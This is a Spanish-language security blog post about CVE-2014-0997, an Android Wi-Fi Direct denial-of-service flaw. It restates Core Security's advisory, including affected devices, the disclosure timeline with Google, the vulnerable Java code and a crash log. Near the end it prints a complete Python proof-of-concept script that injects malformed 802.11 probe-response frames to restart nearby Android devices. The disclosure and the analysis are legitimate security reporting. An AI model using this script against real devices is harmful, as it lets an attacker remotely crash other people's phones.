Tutoriales y Manuales
Entradas Mensuales
-
►
2024
(Total:
1019
)
- ► septiembre (Total: 50 )
-
►
2023
(Total:
710
)
- ► septiembre (Total: 65 )
-
►
2022
(Total:
967
)
- ► septiembre (Total: 72 )
-
►
2021
(Total:
730
)
- ► septiembre (Total: 56 )
-
►
2020
(Total:
212
)
- ► septiembre (Total: 21 )
-
►
2019
(Total:
102
)
- ► septiembre (Total: 14 )
-
►
2017
(Total:
231
)
- ► septiembre (Total: 16 )
-
►
2016
(Total:
266
)
- ► septiembre (Total: 38 )
-
▼
2015
(Total:
445
)
- ► septiembre (Total: 47 )
-
▼
enero
(Total:
51
)
- Google da más de 1 millón y medio de dólares en el...
- Vulnerabilidad en Wi-Fi Direct de Android permite ...
- Mozilla hace una donación a la red Tor
- Disponible LibreOffice 4.4 con nueva interfaz
- Manual análisis tráfico de red con Wireshark
- El mayor ataque DDoS alcanzó los 400Gbps en 2014
- YouTube utilizará por defecto HTML5 en lugar de F...
- Características técnicas del Bq Aquaris E4.5 Ubuntu
- GHOST: glibc: buffer overflow en gethostbyname CVE...
- FairPhone: el teléfono móvil justo
- Lizard Squad tumba Facebook, Instagram y MySpace
- Vodafone confirma el bloqueo a The Pirate Bay por ...
- Lizard Squad hackea la web de Malaysia Airlines
- Disponible Wifislax-4.10.1 (Versión de mantenimiento)
- Nvidia amplía la familia Maxwell con la GeForce GT...
- La policía incautó 50 servidores en la redada cont...
- Solucionada vulnerabilidad XSS en el panel de cont...
- LibreOffice Viewer Beta disponible para Android
- Nueva variante del Ransomware CryptoLocker descubi...
- Nueva vulnerabilidad 0day en Flash Player
- Estudio del mejor disco duro mecánico del 2014 por...
- Las peores contraseñas del 2014
- El registrador de dominios GoDaddy soluciona una g...
- WhatsApp empieza a banear por 24 horas a los usuar...
- Jornadas X1RedMasSegura 2015
- Llega Adamo móvil para clientes de la compañía
- Detienen a un joven de 18 años acusado de pertenec...
- Disponible Tails 1.2.3 la distribución Linux para ...
- KeySweeper cargador USB registra todas las pulsaci...
- Jornadas INCIBE de ciberseguridad para estudiantes...
- Exploit Pack el framework Metasploit open source
- Dark Mail, el e-mail seguro del fundador de Lavabit
- Se cumplen dos años del suicidio de Aaron Swartz
- Ataques XSS avanzados y ejemplos de explotación
- Guía básica de privacidad, anonimato y autodefensa...
- SPARTA Python Gui para hydra y nmap
- "Volveré" El mensaje cifrado oculto de The Pirate Bay
- Manual - Tutorial WPS Pin Generator para Wifislax
- Manual GOYscript (WEP, WPA & WPS)
- Kali Linux NetHunter - ROM de Kali para Android co...
- Script automatizado GeminisAuditor v1.0 [WEP, WPA,...
- Disponible para descargar la preview de Microsoft ...
- Softavir - el antivirus español basado en listas b...
- Pentoo: una distribución dirigida a la seguridad i...
- LINSET 0.14 - WPA/2 Hack sin Fuerza Bruta - Crack...
- 4Chan primera víctima del ataque DDoS utilizando L...
- Twitter permite eliminar la localización de tus me...
- Colección de 2386 juegos de MS-DOS para jugar desd...
- Lizard Squad ofrece su servicio de pago por realiz...
- Continúan las detenciones de supuestos miembros de...
- II Jornadas de Seguridad y Ciberdefensa de la Univ...
-
►
2014
(Total:
185
)
- ► septiembre (Total: 18 )
-
►
2013
(Total:
100
)
- ► septiembre (Total: 3 )
-
►
2011
(Total:
7
)
- ► septiembre (Total: 1 )
Blogroll
Etiquetas
seguridad
(
395
)
privacidad
(
363
)
google
(
353
)
ransomware
(
338
)
vulnerabilidad
(
301
)
Malware
(
263
)
Windows
(
243
)
android
(
242
)
cve
(
235
)
tutorial
(
235
)
manual
(
220
)
software
(
201
)
hardware
(
193
)
linux
(
124
)
twitter
(
115
)
ddos
(
94
)
WhatsApp
(
90
)
Wifi
(
85
)
cifrado
(
77
)
herramientas
(
75
)
hacking
(
73
)
sysadmin
(
67
)
app
(
65
)
Networking
(
56
)
nvidia
(
52
)
ssd
(
51
)
youtube
(
50
)
adobe
(
43
)
firmware
(
42
)
office
(
41
)
hack
(
40
)
firefox
(
35
)
contraseñas
(
32
)
eventos
(
32
)
antivirus
(
31
)
juegos
(
31
)
cms
(
30
)
flash
(
28
)
anonymous
(
27
)
MAC
(
25
)
apache
(
25
)
programación
(
25
)
exploit
(
23
)
javascript
(
22
)
multimedia
(
22
)
Kernel
(
20
)
ssl
(
19
)
SeguridadWireless
(
17
)
documental
(
16
)
Forense
(
15
)
conferencia
(
15
)
Debugger
(
14
)
lizard squad
(
14
)
técnicas hacking
(
13
)
auditoría
(
12
)
delitos
(
11
)
metasploit
(
11
)
Virtualización
(
10
)
adamo
(
9
)
reversing
(
9
)
Rootkit
(
8
)
Ehn-Dev
(
7
)
MAC Adress
(
6
)
antimalware
(
6
)
oclHashcat
(
5
)
Entradas populares
-
Después de ver qué es una vCPU y la diferencia entre núcleos (cores) e hilos en los procesadores, pasamos a explicar toda la nomenclatura d...
-
En el panorama en constante evolución de la seguridad de redes, OpnSense se ha convertido en una formidable solución de firewall. Nacido de...
-
Pese a que Gemini ofrece multitudes de opciones, recientemente, se ha dado a conocer una situación fuera de lo común. Hace unos días, un es...
Vulnerabilidad en Wi-Fi Direct de Android permite reiniciar el dispositivo
viernes, 30 de enero de 2015
|
Publicado por
el-brujo
|
Editar entrada
Investigadores de seguridad de Core Security han decidido publicar una vulnerabilidad en Wi-Fi Direct Android que permite denegación de servicio DoS, ya que después de avisar al equipo de seguridad de Android, han obtenido como respuesta que la vulnerabilidad es de baja gravedad y por ello no tiene previsto fecha para el parche.
Wi-Fi Direct es un estándar que permite que varios dispositivos se comuniquen mediante la norma inalámbrica Wi-Fi sin necesidad de un punto de acceso intermedio.
Wi-Fi Direct funciona de una manera muy parecida a Bluetooth, sólo con un mayor alcance y mayor estabilidad. Los dispositivos como impresoras y ratones inalámbricos pueden utilizar Wi-Fi Direct como una conexión directa desde el ordenador. Además, si un objeto tiene capacidades Wi-Fi, también podría tener Wi-Fi Direct, que podría permitir que usted controle con su smartphone en un futuro próximo .
Core Security informó a Google de la vulnerabilidad en el mes de septiembre y ésta no ha proporcionado un parche hasta la fecha. Lo mismo ocurre con Google realiza con su proyecto Zero cuando revela vulnerabilidades de otros fabricantes de software como Microsoft o Apple y publica las vulnerabilidades en un plazo de 90 días, estén o no parcheadas.
Andrés Blanco del Equipo Core Security preguntó de nuevo por la vulnerabilidad al equipo de seguridad de Android en octubre sin respuesta afirmativa y de en enero de este año avisó que publicaría el advisory el 26 de enero de 2015.
Algunos dispositivos Android se ven afectados por un ataque de denegación de servicio durante la búsqueda de dispositivos Wi-Fi Direct.
Un atacante podría enviar una señal 802.11 con una respuesta mal formada (especialmente diseñada) haciendo que el subsistema de Dalvik se reinicie debido a una excepción "Unhandle" en la clase WiFiMonitor.
Por debajo de la función que se encarga de eventos wpa_supplicant. Esta función devuelve una jstring de llamar NewStringUTF método.
La especificación WiFi directa define el procedimiento de descubrimiento P2P para permitir que los dispositivos P2P para el intercambio de información de dispositivo, el nombre del dispositivo forma parte de esta información.
La clase WifiP2pDevice, ubicado en /wifi/java/android/net/wifi/p2p/WifiP2pDevice.java, representa un dispositivo p2p Wi-Fi. El método constructor recibe la cadena proporcionada por el wpa_supplicant y lanza una IllegalArgumentException si el evento está mal formado.
A continuación el contenido parcial del archivo WiFiP2PDevice.java.
En algunos dispositivos Android al procesar una trama de respuesta de la sonda con un elemento de información WiFi-Direct (P2P) que contiene un atributo de nombre de dispositivo con bytes específicos genera una cadena de eventos suplicante malformado que termina tirando la IllegalArgumentException.
Dado que esta excepción no se maneja el sistema se reinicia Android. A continuación el contenido parcial de la Logcat de un Samsung SM-T310 con Android 4.2.2.
Fuentes:
http://muyseguridad.net/2015/01/30/wi-fi-direct-android
http://thehackernews.com/2015/01/WiFi-direct-android-hacking.html
http://www.coresecurity.com/advisories/android-wifi-direct-denial-service
Wi-Fi Direct es un estándar que permite que varios dispositivos se comuniquen mediante la norma inalámbrica Wi-Fi sin necesidad de un punto de acceso intermedio.
Wi-Fi Direct funciona de una manera muy parecida a Bluetooth, sólo con un mayor alcance y mayor estabilidad. Los dispositivos como impresoras y ratones inalámbricos pueden utilizar Wi-Fi Direct como una conexión directa desde el ordenador. Además, si un objeto tiene capacidades Wi-Fi, también podría tener Wi-Fi Direct, que podría permitir que usted controle con su smartphone en un futuro próximo .
Core Security informó a Google de la vulnerabilidad en el mes de septiembre y ésta no ha proporcionado un parche hasta la fecha. Lo mismo ocurre con Google realiza con su proyecto Zero cuando revela vulnerabilidades de otros fabricantes de software como Microsoft o Apple y publica las vulnerabilidades en un plazo de 90 días, estén o no parcheadas.
Andrés Blanco del Equipo Core Security preguntó de nuevo por la vulnerabilidad al equipo de seguridad de Android en octubre sin respuesta afirmativa y de en enero de este año avisó que publicaría el advisory el 26 de enero de 2015.
Descripción - Resumen de la vulnerabilidad
- Impacto: Denegación de Servicio (Denial of service, DoS)
- Explotable remotamente: Si
- Localmente explotable: No
- CVE Name: CVE-2014-0997
Algunos dispositivos Android se ven afectados por un ataque de denegación de servicio durante la búsqueda de dispositivos Wi-Fi Direct.
Un atacante podría enviar una señal 802.11 con una respuesta mal formada (especialmente diseñada) haciendo que el subsistema de Dalvik se reinicie debido a una excepción "Unhandle" en la clase WiFiMonitor.
Dispositivos vulnerables (afectados)
- Nexus 5 - Android 4.4.4
- Nexus 4 - Android 4.4.4
- LG D806 - Android 4.2.2
- Samsung SM-T310 - Android 4.2.2
- Motorola RAZR HD - Android 4.1.2
Time Line
- 09/26/2014: equipo de seguridad de los contactos Core Security Android para informarles de que una vulnerabilidad se ha encontrado en Android. Core Security envía un proyecto de asesoramiento con los detalles técnicos y los archivos de PoC.
- 29/09/2014: Android Equipo de Seguridad reconoce la recepción del aviso.
- 09/30/2014: Core Security notifica que la fecha de publicación provisional está fijada para octubre 20rd, 2014.
- 09/30/2014: Android Security Team, confirma la recepción.
- 10/16/2014: Core Security solicita una actualización de estado.
- 10/16/2014: Android Security Team responde que tienen clasificar la vulnerabilidad como baja gravedad y la actualidad no tenemos una línea de tiempo para la liberación de una solución.
- 20/10/2014: Core Security no está completamente de acuerdo con la clasificación de la vulnerabilidad y reprogramar la publicación del aviso.
- 10/16/2014: Android Security Team, reconoce y fortalece su posición de que actualmente no tienen una línea de tiempo para la liberación de una solución.
- 06/01/2015: Core Security solicita una actualización de estado.
- 01/12/2015: Core Security pregunta por confirmación de recepción del correo electrónico anterior.
- 16/01/2015: Android Security Team reconoce y responder que no tienen actualmente una línea de tiempo para la liberación de una solución.
- 01/19/2015: Core Security avisa que necesita la cooperación de proveedores con el fin de mantener este proceso coordinado. Si proveedor se niega a proporcionar la información solicitada el aviso se dará a conocer etiquetado como 'liberación usuario. La advertencia es re-programado para el 26 de enero 2015.
- 20/01/2015: Android Security Team reconoce y responder que no tienen actualmente una línea de tiempo para la liberación de una solución.
- 01/26/2015: El aviso CORE-2.015-0.002 se publica.
Descripción técnica
Android hace uso de un wpa_supplicant modificada [1] con el fin de proporcionar una interfaz entre el controlador inalámbrico y el marco de la plataforma Android.Por debajo de la función que se encarga de eventos wpa_supplicant. Esta función devuelve una jstring de llamar NewStringUTF método.
static jstring android_net_wifi_waitForEvent(JNIEnv* env, jobject)
{
char buf[EVENT_BUF_SIZE];
int nread = ::wifi_wait_for_event(buf, sizeof buf);
if (nread > 0) {
return env->NewStringUTF(buf);
} else {
return NULL;
}
}
La especificación WiFi directa define el procedimiento de descubrimiento P2P para permitir que los dispositivos P2P para el intercambio de información de dispositivo, el nombre del dispositivo forma parte de esta información.
La clase WifiP2pDevice, ubicado en /wifi/java/android/net/wifi/p2p/WifiP2pDevice.java, representa un dispositivo p2p Wi-Fi. El método constructor recibe la cadena proporcionada por el wpa_supplicant y lanza una IllegalArgumentException si el evento está mal formado.
A continuación el contenido parcial del archivo WiFiP2PDevice.java.
[...]
/** Detailed device string pattern with WFD info
* Example:
* P2P-DEVICE-FOUND 00:18:6b:de:a3:6e p2p_dev_addr=00:18:6b:de:a3:6e
* pri_dev_type=1-0050F204-1 name='DWD-300-DEA36E' config_methods=0x188
* dev_capab=0x21 group_capab=0x9
*/
private static final Pattern detailedDevicePattern = Pattern.compile(
"((?:[0-9a-f]{2}:){5}[0-9a-f]{2}) " +
"(\\d+ )?" +
"p2p_dev_addr=((?:[0-9a-f]{2}:){5}[0-9a-f]{2}) " +
"pri_dev_type=(\\d+-[0-9a-fA-F]+-\\d+) " +
"name='(.*)' " +
"config_methods=(0x[0-9a-fA-F]+) " +
"dev_capab=(0x[0-9a-fA-F]+) " +
"group_capab=(0x[0-9a-fA-F]+)" +
"( wfd_dev_info=0x000006([0-9a-fA-F]{12}))?"
);
[...]
/**
* @param string formats supported include
* P2P-DEVICE-FOUND fa:7b:7a:42:02:13 p2p_dev_addr=fa:7b:7a:42:02:13
* pri_dev_type=1-0050F204-1 name='p2p-TEST1' config_methods=0x188 dev_capab=0x27
* group_capab=0x0 wfd_dev_info=000006015d022a0032
*
* P2P-DEVICE-LOST p2p_dev_addr=fa:7b:7a:42:02:13
*
* AP-STA-CONNECTED 42:fc:89:a8:96:09 [p2p_dev_addr=02:90:4c:a0:92:54]
*
* AP-STA-DISCONNECTED 42:fc:89:a8:96:09 [p2p_dev_addr=02:90:4c:a0:92:54]
*
* fa:7b:7a:42:02:13
*
* Note: The events formats can be looked up in the wpa_supplicant code
* @hide
*/
public WifiP2pDevice(String string) throws IllegalArgumentException {
String[] tokens = string.split("[ \n]");
Matcher match;
if (tokens.length < 1) {
throw new IllegalArgumentException("Malformed supplicant event");
}
switch (tokens.length) {
case 1:
/* Just a device address */
deviceAddress = string;
return;
case 2:
match = twoTokenPattern.matcher(string);
if (!match.find()) {
throw new IllegalArgumentException("Malformed supplicant event");
}
deviceAddress = match.group(2);
return;
case 3:
match = threeTokenPattern.matcher(string);
if (!match.find()) {
throw new IllegalArgumentException("Malformed supplicant event");
}
deviceAddress = match.group(1);
return;
default:
match = detailedDevicePattern.matcher(string);
if (!match.find()) {
throw new IllegalArgumentException("Malformed supplicant event");
}
deviceAddress = match.group(3);
primaryDeviceType = match.group(4);
deviceName = match.group(5);
wpsConfigMethodsSupported = parseHex(match.group(6));
deviceCapability = parseHex(match.group(7));
groupCapability = parseHex(match.group(8));
if (match.group(9) != null) {
String str = match.group(10);
wfdInfo = new WifiP2pWfdInfo(parseHex(str.substring(0,4)),
parseHex(str.substring(4,8)),
parseHex(str.substring(8,12)));
}
break;
}
if (tokens[0].startsWith("P2P-DEVICE-FOUND")) {
status = AVAILABLE;
}
}
[...]
En algunos dispositivos Android al procesar una trama de respuesta de la sonda con un elemento de información WiFi-Direct (P2P) que contiene un atributo de nombre de dispositivo con bytes específicos genera una cadena de eventos suplicante malformado que termina tirando la IllegalArgumentException.
Dado que esta excepción no se maneja el sistema se reinicia Android. A continuación el contenido parcial de la Logcat de un Samsung SM-T310 con Android 4.2.2.
I/p2p_supplicant( 2832): P2P-DEVICE-FOUND 00.EF.00 p2p_dev_addr=00.EF.00 pri_dev_type=10-0050F204-5 'fa¬¬' config_methods=0x188 dev_capab=0x21 group_capab=0x0
E/AndroidRuntime( 2129): !@*** FATAL EXCEPTION IN SYSTEM PROCESS: WifiMonitor
E/AndroidRuntime( 2129): java.lang.IllegalArgumentException: Malformed supplicant event
E/AndroidRuntime( 2129): at android.net.wifi.p2p.WifiP2pDevice.(WifiP2pDevice.java:229)
E/AndroidRuntime( 2129): at android.net.wifi.WifiMonitor$MonitorThread.handleP2pEvents(WifiMonitor.java:966)
E/AndroidRuntime( 2129): at android.net.wifi.WifiMonitor$MonitorThread.run(WifiMonitor.java:574)
E/android.os.Debug( 2129): !@Dumpstate > dumpstate -k -t -z -d -o /data/log/dumpstate_sys_error
PoC (Proof of Code) Concepto de Prueba
#!/usr/bin/env python
import sys
import time
import struct
import PyLorcon2
def get_probe_response(source, destination, channel):
frame = str()
frame += "\x50\x00" # Frame Control
frame += "\x00\x00" # Duration
frame += destination
frame += source
frame += source
frame += "\x00\x00" # Sequence Control
frame += "\x00\x00\x00\x00\x00\x00\x00\x00" # Timestamp
frame += "\x64\x00" # Beacon Interval
frame += "\x30\x04" # Capabilities Information
# SSID IE
frame += "\x00"
frame += "\x07"
frame += "DIRECT-"
# Supported Rates
frame += "\x01"
frame += "\x08"
frame += "\x8C\x12\x98\x24\xB0\x48\x60\x6C"
# DS Parameter Set
frame += "\x03"
frame += "\x01"
frame += struct.pack("B", channel)
# P2P
frame += "\xDD"
frame += "\x27"
frame += "\x50\x6F\x9A"
frame += "\x09"
# P2P Capabilities
frame += "\x02" # ID
frame += "\x02\x00" # Length
frame += "\x21\x00"
# P2P Device Info
frame += "\x0D" # ID
frame += "\x1B\x00" # Length
frame += source
frame += "\x01\x88"
frame += "\x00\x0A\x00\x50\xF2\x04\x00\x05"
frame += "\x00"
frame += "\x10\x11"
frame += "\x00\x06"
frame += "fafa\xFA\xFA"
return frame
def str_to_mac(address):
return "".join(map(lambda i: chr(int(i, 16)), address.split(":")))
if __name__ == "__main__":
if len(sys.argv) != 3:
print "Usage:"
print " poc.py"
print "Example:"
print " poc.py wlan0 00:11:22:33:44:55"
sys.exit(-1)
iface = sys.argv[1]
destination = str_to_mac(sys.argv[2])
context = PyLorcon2.Context(iface)
context.open_injmon()
channel = 1
source = str_to_mac("00:11:22:33:44:55")
frame = get_probe_response(source, destination, channel)
print "Injecting PoC."
for i in range(100):
context.send_bytes(frame)
time.sleep(0.100)
Fuentes:
http://muyseguridad.net/2015/01/30/wi-fi-direct-android
http://thehackernews.com/2015/01/WiFi-direct-android-hacking.html
http://www.coresecurity.com/advisories/android-wifi-direct-denial-service
Enviar por correo electrónico
Escribe un blog
Compartir en X
Compartir con Facebook
Compartir en Pinterest
Etiquetas:
advisory
,
android
,
google
,
java
,
poc
,
seguridad
,
vulnerabilidad
,
Wifi
,
wifi direct
0 comentarios :
Publicar un comentario
Los comentarios pueden ser revisados en cualquier momento por los moderadores.
Serán publicados aquellos que cumplan las siguientes condiciones:
- Comentario acorde al contenido del post.
- Prohibido mensajes de tipo SPAM.
- Evite incluir links innecesarios en su comentario.
- Contenidos ofensivos, amenazas e insultos no serán permitidos.
Debe saber que los comentarios de los lectores no reflejan necesariamente la opinión del STAFF.